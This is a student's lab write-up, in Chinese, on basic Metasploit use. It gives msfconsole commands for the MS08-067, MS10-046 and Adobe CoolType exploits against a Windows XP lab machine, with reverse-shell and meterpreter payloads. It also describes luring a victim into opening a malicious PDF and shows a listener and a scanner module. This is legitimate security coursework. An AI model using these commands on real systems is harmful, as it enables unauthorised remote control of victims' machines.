• 20155211 Exp5 MSF基础应用


    20155211 Exp5 MSF基础应用

    基础问题回答

    • 用自己的话解释什么是exploit,payload,encode?
    1. exploit:漏洞攻击。一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。一个漏洞攻击程序可以在本地运行也可以远程运行,远程运行的漏洞攻击可以理论上获取被攻击系统的所有控制权。

    2. payload:有效载荷,可以理解为搞破坏的关键代码。电脑病毒中可以直接完成预定目标的代码段便是其“有效载荷”。

    3. encode:编码。通过一些特殊手段的编码,可以既保证有效载荷不被破坏,又使得漏洞攻击程序不会被侦察到。

    实践内容

    • 因为个人电脑设备的原因,借用同组同学20155223苏黄永郦同学的电脑完成本次实验

    主动攻击:ms08_067漏洞攻击

    • 攻击方:Kali Linux x64
    • 靶机:Windows XP SP3
    • 关闭XP的所有防御,包括防火墙和杀毒软件。
    • 在Kali机启动msfconsole,按照指导步骤输入以下代码:
    use exploit/windows/smb/ms08_067_netapi   // 使用ms08_067漏洞攻击方式
    set payload generic/shell_reverse_tcp       // 以shell反向tcp连接为有效载荷
    set RHOST 192.168.129.134     // 受害者的IP
    set LHOST 192.168.129.133     // 施害者的IP
    set target 0      // 设置目标,0为无差别攻击
    

    输入exploit开始发动攻击:

    对浏览器攻击:ms10_046漏洞攻击

    • 受害者:Windows XP SP3(zh_cn)
    • 攻击者:Kali Linux
    • 在Kali攻击机开启msfconsole,输入以下命令:
    use exploit/windows/browser/ms10_046_shortcut_icon_dllloader // 使用浏览器漏洞
    set payload windows/meterpreter/reverse_tcp // 选择反向链接载荷
    
    • 关于本次攻击的设置:
    set SRVHOST 192.168.129.133 // 设置服务器主机IP
    set LHOST 192.168.129.133 // 设置攻击机IP
    
    • 之后输入exploit会出现一段URI:http://192.168.129.133:80/,同时控制台进入监听状态。

    • xp访问这个URI,会弹出一个这样的窗口:

    • 同时,一直在监听的控制台同受害者建立起一个连接:

    • 输入sessions查看有多少机器被反向链接到Kali机上(只有一个)。

    • 再次输入sessions -i 1以控制受害者。

    对Adobe的漏洞攻击

    • 输入exploit/windows/fileformat/adobe_cooltype_sing确定攻击方案。

    • 设置很简单,只需要确定攻击机的IP地址就可以了,端口是学号5211。

    • 把生成的文件发送到受害者,并诱使其打开这个来路不明的pdf文件。

    • 同时,在Kali的msfconsole上输入以下命令开始监听:

    use exploit/multi/handler
    set LHOST 192.168.129.133
    set LPORT 5211
    exploit
    

    辅助模块的应用

    • use scanner/steam/server_info,show options 这扫描模块只用设置扫描起点IP即可,扫描范围默认为10(从起始地址开始往后扫10个)。端口固定为UDP端口27015,端口27015只是用作输入/输出的通信端口
    • 设置起点为192.168.129.135。如果在这个范围内真的有服务器,我就想知道是哪个人会在这么长的地方设置服务器。
    • 然后是没有,emmmm并不意外。

    实验总结与体会

    感觉msf是个神奇的东西。。。虽然我们学的都是最简单的,但是每次实验做完都有种细思极恐的感觉。。这次尤为严重。。虽然知道自己不会被这么对待。。但是想到别人会这样对待你还是慢怂的。

  • 相关阅读:
    [Bzoj2120]数颜色
    [Bzoj2049][Sdoi2008]Cave 洞穴勘测
    [2019上海网络赛F题]Rhyme scheme
    [2019上海网络赛J题]Stone game
    Codeforces Round #688 (Div. 2) C
    Educational Codeforces Round 99 (Rated for Div. 2) D
    Educational Codeforces Round 99 (Rated for Div. 2) B
    Codeforces Round #685 (Div. 2) D
    Codeforces Round #685 (Div. 2) C
    Codeforces Round #685 (Div. 2) B
  • 原文地址:https://www.cnblogs.com/xxy9712/p/8988198.html
Copyright © 2020-2023  润新知